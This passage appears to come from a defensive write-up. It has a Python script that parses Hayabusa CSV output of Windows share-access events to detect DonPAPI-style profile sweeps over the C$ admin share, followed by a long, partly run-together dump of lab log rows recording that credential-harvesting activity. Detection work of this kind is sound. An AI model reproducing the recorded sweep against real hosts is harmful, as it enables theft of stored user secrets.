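2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,5140_NetworkShareAccess.yml,DonPAPI.evtx
2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,5145_NetworkShareFileAccess.yml,DonPAPI.evtx
2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,5145_NetworkShareFileAccess.yml,DonPAPI.evtx
2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,5145_NetworkShareFileAccess.yml,DonPAPI.evtx
2021-12-12 16:16:05.306 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\baretail - Shortcut.lnk | IP Addr: 10.23.123.11 | LID: 0x8723c99,5145_NetworkShareFileAccess.yml,DonPAPI.evtx
2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,5145_NetworkShareFileAccess.yml,DonPAPI.evtx
2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,5145_NetworkShareFileAccess.yml,DonPAPI.evtx
2021-12-12 16:20:00.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: jdoe | Share Name: \\*\Finance | Share Path: \??\D:\Finance | Path: Q4\budget.xlsx | IP Addr: 10.23.123.50 | LID: 0x9a1b2c3,5145_NetworkShareFileAccess.yml,other.evtx
"""

# Disk admin shares a profile sweep goes through (assumption: IPC$ carries no file paths)
ADMIN_SHARES = {"C$", "ADMIN$"}
# Relative path under the share root: Users\<profile>\Recent or ...\Desktop, optionally deeper
PROFILE_DIR_RE = re.compile(r"^Users\\([^\\]+)\\(Recent|Desktop)(?:\\|$)", re.IGNORECASE)


def parse_details(details):
    """Split Hayabusa's 'Key: value | Key: value' Details field into a dict."""
    fields = {}
    for part in details.split(" | "):
        key, sep, value = part.partition(": ")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def load_rows(csv_text):
    """Read the CSV and pull share, path, source IP and logon ID out of Details."""
    rows = []
    for raw in csv.DictReader(io.StringIO(csv_text)):
        d = parse_details(raw["Details"])
        rows.append({
            # %z accepts the '+09:00' offset Hayabusa writes (Python 3.7+)
            "ts": datetime.strptime(raw["Timestamp"], "%Y-%m-%d %H:%M:%S.%f %z"),
            "computer": raw["Computer"],
            "event_id": int(raw["EventID"]),
            "user": d.get("User", ""),
            "share": d.get("Share Name", ""),
            "path": d.get("Path", ""),
            "ip": d.get("IP Addr", ""),
            "lid": d.get("LID", ""),
        })
    return rows


def find_profile_sweeps(rows, min_profiles=2, window_seconds=60):
    """Flag (computer, source IP, logon ID) sessions whose 5145 events read
    Recent and Desktop under at least min_profiles profiles on an admin share
    within window_seconds. Thresholds are assumptions, not Hayabusa defaults."""
    sessions = defaultdict(list)
    for r in rows:
        if r["event_id"] != 5145:
            continue
        if r["share"].rsplit("\\", 1)[-1].upper() not in ADMIN_SHARES:
            continue
        m = PROFILE_DIR_RE.match(r["path"])
        if not m:
            continue
        key = (r["computer"], r["ip"], r["lid"])
        sessions[key].append((r["ts"], m.group(1), m.group(2).lower(), r["user"]))

    findings = []
    for (computer, ip, lid), hits in sessions.items():
        hits.sort(key=lambda h: h[0])
        profiles = {h[1] for h in hits}
        subdirs = {h[2] for h in hits}
        span = (hits[-1][0] - hits[0][0]).total_seconds()
        if len(profiles) >= min_profiles and {"recent", "desktop"} <= subdirs and span <= window_seconds:
            findings.append({
                "computer": computer,
                "ip": ip,
                "lid": lid,
                "user": hits[0][3],
                "profiles": sorted(profiles),
                "hit_count": len(hits),
                "span_seconds": span,
                "first_seen": hits[0][0].isoformat(),
            })
    return findings


if __name__ == "__main__":
    for f in find_profile_sweeps(load_rows(SAMPLE_CSV)):
        print(f"{f['computer']}: {f['user']} from {f['ip']} (LID {f['lid']}) read "
              f"{f['hit_count']} profile dirs across {len(f['profiles'])} profiles "
              f"in {f['span_seconds']:.3f}s: {', '.join(f['profiles'])}")
```

Two caveats when running this against real output. Both events depend on audit policy: 5140 needs Audit File Share and 5145 needs Audit Detailed File Share, which is off by default and very noisy, so filter on the admin shares before aggregating rather than after. Keying the session on (Computer, IP Addr, LID) keeps a legitimate administrator browsing one profile separate from one logon walking all of them, and the same rows give the aggregated rule an admin-share and source-IP scope that the per-row Hayabusa rules, by design, do not apply.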
2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\night.bat | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.370 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.371 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.407 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network 
Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.439 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 